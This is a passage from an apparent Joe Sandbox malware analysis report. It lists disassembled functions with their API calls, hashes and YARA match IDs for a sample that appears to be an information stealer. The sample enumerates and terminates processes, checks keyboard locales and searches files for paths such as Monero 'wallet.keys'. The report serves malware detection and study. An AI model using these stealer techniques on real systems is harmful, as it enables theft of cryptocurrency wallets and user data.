                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %8{=$27g$90oK$OY{$T;~6$TZ?_$j<7$q/n*$s5E
                                    • API String ID: 0-2070337930
                                    • Opcode ID: fa9656eb1dc0bf2beb1c2b33ae366483029cc433523b8d250e028aa6901040a8
                                    • Instruction ID: 766687a789d1e51ad91a4eb54a27c4840a2aff97e0921c5fc30c209c57cb308c
                                    • Opcode Fuzzy Hash: fa9656eb1dc0bf2beb1c2b33ae366483029cc433523b8d250e028aa6901040a8
                                    • Instruction Fuzzy Hash: 8DB216F360C2049FE304AE2DEC8567AFBE9EF94720F1A493DE6C5C7740EA3558058696
                                    Function 001A98E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001A9905
                                    • Process32First.KERNEL32(00199FDE,00000128), ref: 001A9919
                                    • Process32Next.KERNEL32(00199FDE,00000128), ref: 001A992E
                                    • StrCmpCA.SHLWAPI(?,00199FDE), ref: 001A9943
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001A995C
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 001A997A
                                    • CloseHandle.KERNEL32(00000000), ref: 001A9987
                                    • CloseHandle.KERNEL32(00199FDE), ref: 001A9993
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: 4b8671da3da20742166793f0e1f44ea1b652e56c7672b27dbb9320e7fa7954c5
                                    • Instruction ID: bdd02fd9a610e0cdbbda8e2f931254d837df36de453d1af73ed1d6e0335fea79
                                    • Opcode Fuzzy Hash: 4b8671da3da20742166793f0e1f44ea1b652e56c7672b27dbb9320e7fa7954c5
                                    • Instruction Fuzzy Hash: 51112E75A14218EBDB24DFA0DC48BDEB7B8BB49708F0085DCF509A6240EB749B84CF95
                                    Function 001A7D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,001B05B7), ref: 001A7D71
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 001A7D89
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 001A7D9D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 001A7DF2
                                    • LocalFree.KERNEL32(00000000), ref: 001A7EB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: e8c954e53e5d61e298191b410ab4b266de6785ce1f91e98683aaebc618a0c4c0
                                    • Instruction ID: 1baf674be46287d434e05322ca4a5753ac0c422aa7d5929b0076fc4d4e1e63a3
                                    • Opcode Fuzzy Hash: e8c954e53e5d61e298191b410ab4b266de6785ce1f91e98683aaebc618a0c4c0
                                    • Instruction Fuzzy Hash: D3417C75940218ABDB24DFA4DC99BEEB378FF59700F6041D9E00A62280DB742F84CFA1
                                    Function 005E6F2A Relevance: 10.4, Strings: 7, Instructions: 1681COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .+'$L#w$O)v$QB{o$~R@$~ne]$!wv
                                    • API String ID: 0-46411695
                                    • Opcode ID: 8610d914c8711e35527b6abf8c33266b12bcf931127ebdd18ae2da91cd8daa19
                                    • Instruction ID: 9ccb18be5da5fcca46f98c5ee50d4bcab43769de047e5f16c3ad593d01bd68bf
                                    • Opcode Fuzzy Hash: 8610d914c8711e35527b6abf8c33266b12bcf931127ebdd18ae2da91cd8daa19
                                    • Instruction Fuzzy Hash: 80B23AF3A0C2006FE704AE2DEC8567ABBE5EFD4320F1A453DEAC5C7744E93598058696
                                    Function 0019E530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,001B0D79), ref: 0019E5A2
                                    • StrCmpCA.SHLWAPI(?,001B15F0), ref: 0019E5F2
                                    • StrCmpCA.SHLWAPI(?,001B15F4), ref: 0019E608
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0019ECDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: a5f4d69bea1d96b54b9b8d19f70338ed3468ab888f19c32a2daebbc36415b522
                                    • Instruction ID: fba9b6da49a398334de1d6d993fc91559e80bb12a5f0c0527c4451a5ccf271a9
                                    • Opcode Fuzzy Hash: a5f4d69bea1d96b54b9b8d19f70338ed3468ab888f19c32a2daebbc36415b522
                                    • Instruction Fuzzy Hash: 61123176A10218ABDB54FB70DDA6EED7379AF65300F8045E9B50A52091EF306F48CF62
                                    Function 005E1FBE Relevance: 9.1, Strings: 6, Instructions: 1607COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: '.=3$A[J$t^^!$x+[y$4g$C_
                                    • API String ID: 0-1315223046
                                    • Opcode ID: 9589312d4797113ed4907397dcd95034276c54a006eea23f960f792cc70d3905
                                    • Instruction ID: a4a230a8c968ee199e4ea17a72ec2f75c87e2401e17211c010b75fad965756b2
                                    • Opcode Fuzzy Hash: 9589312d4797113ed4907397dcd95034276c54a006eea23f960f792cc70d3905
                                    • Instruction Fuzzy Hash: BDB248F3A082049FD7046E2DEC4567ABBEAEFD4320F1A453DEAC5C7744EA3558058693
                                    Function 005EC092 Relevance: 9.1, Strings: 6, Instructions: 1591COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 5:U$Qm>$W<-K$l2z>$q#_?$qf7_
                                    • API String ID: 0-4233599896
                                    • Opcode ID: 9047c6dade3c9be2aef3928e39706a024e4f3a07510e79471b1a9d8fe5f5ab72
                                    • Instruction ID: d4c498535db874dbca7ddb7b57d8852a7a55f92dc9d6a72bf2c84da0dc366eee
                                    • Opcode Fuzzy Hash: 9047c6dade3c9be2aef3928e39706a024e4f3a07510e79471b1a9d8fe5f5ab72
                                    • Instruction Fuzzy Hash: 97B239F360C2049FE304AE2DEC8567ABBE5EFD4720F1A853DE6C4C3744E63599058696
                                    Function 005EDB57 Relevance: 7.9, Strings: 5, Instructions: 1654COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $)~_$qv}$r}$8}?$Jbo
                                    • API String ID: 0-2750375006
                                    • Opcode ID: 6c30c74771bd3310fe3249cb954c3cd948a0bc3166f8c496da31d678e1ddf07e
                                    • Instruction ID: 1e80134b46d135d1386c26019c147a64aa7478b5a5afacbaf7e33564464c49df
                                    • Opcode Fuzzy Hash: 6c30c74771bd3310fe3249cb954c3cd948a0bc3166f8c496da31d678e1ddf07e
                                    • Instruction Fuzzy Hash: B7B207F36082049FE304AE2DEC8567AFBE9EF94720F16493DE6C5C7744EA3598018697
                                    Function 005E8A9F Relevance: 7.8, Strings: 5, Instructions: 1582COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: TC"$Vh~[$d7~g$d7~g$Rw
                                    • API String ID: 0-2312026313
                                    • Opcode ID: 8e77a25462c5fb417673b8d78985e3649266b09ff0c5247e372bf628478d30bf
                                    • Instruction ID: 0b1fdfa1783cd99e9bfd1f18b149fc063c46f6e54473e8067962d2f98e9ad6d2
                                    • Opcode Fuzzy Hash: 8e77a25462c5fb417673b8d78985e3649266b09ff0c5247e372bf628478d30bf
                                    • Instruction Fuzzy Hash: 46B2D6F3A0C2149FE3046E2DEC8566AFBE9EF94720F1A493DEAC493744E67558008797
                                    Function 001FF8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: \u$\u${${$}$}
                                    • API String ID: 0-582841131
                                    • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction ID: 41ffde2e3be3ab51b3b6db22ad39ada09351841690f488cc40b12c38ef94f492
                                    • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction Fuzzy Hash: 3F414B12E19BD9C5CB058B7444A02AEBFB26FD6210F6D82AEC49D1B3C2C7B4414AD3A5
                                    Function 0019C920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0019C971
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0019C97C
                                    • lstrcat.KERNEL32(?,001B0B47), ref: 0019CA43
                                    • lstrcat.KERNEL32(?,001B0B4B), ref: 0019CA57
                                    • lstrcat.KERNEL32(?,001B0B4E), ref: 0019CA78
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
